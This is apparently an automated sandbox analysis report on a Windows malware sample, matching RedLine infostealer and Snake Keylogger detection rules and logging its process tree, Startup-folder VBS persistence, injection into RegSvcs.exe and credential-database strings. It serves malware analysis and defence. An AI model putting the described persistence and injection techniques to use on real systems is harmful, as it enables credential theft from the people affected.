Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0575B818	7_2_0575B818
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 10_2_0115EF40	10_2_0115EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02705F2D	11_2_02705F2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02701448	11_2_02701448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02701437	11_2_02701437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02701118	11_2_02701118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_027011A8	11_2_027011A8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: String function: 00D60AE3 appears 70 times
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: String function: 00D68900 appears 42 times
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: String function: 00D47DE1 appears 35 times
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: String function: 00F97DE1 appears 35 times
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: String function: 00FB0AE3 appears 70 times
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: String function: 00FB8900 appears 42 times

Source: 7b4Iaf58Rp.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.neophobia.exe.b40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.RegSvcs.exe.391e790.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.RegSvcs.exe.391e790.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.RegSvcs.exe.38f6458.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.RegSvcs.exe.38f6458.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.RegSvcs.exe.2591b9e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.RegSvcs.exe.2591b9e.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.RegSvcs.exe.391e790.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.RegSvcs.exe.391e790.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.neophobia.exe.1490000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.RegSvcs.exe.2591b9e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.RegSvcs.exe.2591b9e.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.RegSvcs.exe.38f5570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.RegSvcs.exe.38f5570.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.RegSvcs.exe.2590cb6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.RegSvcs.exe.2590cb6.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.RegSvcs.exe.2590cb6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.RegSvcs.exe.2590cb6.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.RegSvcs.exe.38f6458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.RegSvcs.exe.38f6458.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.5710000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.5710000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.neophobia.exe.2320000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.RegSvcs.exe.5710000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.5710000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.RegSvcs.exe.38f5570.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.RegSvcs.exe.38f5570.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.neophobia.exe.ba0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.1571996988.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000004.00000002.1531826494.0000000001490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.2664119117.0000000002752000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.1495389103.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000002.1648249221.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: RegSvcs.exe PID: 2352, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 6840, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@18/8@3/2

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FFA06A GetLastError,FormatMessageW,

0_2_00FFA06A

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FE81CB AdjustTokenPrivileges,CloseHandle,	0_2_00FE81CB
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FE87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00FE87E1
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D981CB AdjustTokenPrivileges,CloseHandle,	2_2_00D981CB
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D987E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_00D987E1

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FFB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00FFB3FB

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_0100EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0100EE0D

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_010083BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_010083BB

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00F94E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00F94E89

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

File created: C:\Users\user\AppData\Local\scrolar

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

File created: C:\Users\user\AppData\Local\Temp\aut4F2F.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs"

Source: 7b4Iaf58Rp.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000007.00000002.2664984338.000000000327E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2664984338.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2664984338.00000000032BD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2664984338.000000000329C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2664984338.000000000328E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.0000000002A5C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2666782183.000000000396E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 7b4Iaf58Rp.exe	Virustotal: Detection: 68%
Source: 7b4Iaf58Rp.exe	ReversingLabs: Detection: 91%

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

File read: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\7b4Iaf58Rp.exe "C:\Users\user\Desktop\7b4Iaf58Rp.exe"
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Process created: C:\Users\user\AppData\Local\scrolar\neophobia.exe "C:\Users\user\Desktop\7b4Iaf58Rp.exe"
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7b4Iaf58Rp.exe"
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Users\user\AppData\Local\scrolar\neophobia.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Users\user\AppData\Local\scrolar\neophobia.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\scrolar\neophobia.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Process created: C:\Users\user\AppData\Local\scrolar\neophobia.exe "C:\Users\user\Desktop\7b4Iaf58Rp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7b4Iaf58Rp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Users\user\AppData\Local\scrolar\neophobia.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Users\user\AppData\Local\scrolar\neophobia.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\scrolar\neophobia.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"	Jump to behavior

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: wininet.dll	Jump to behavior
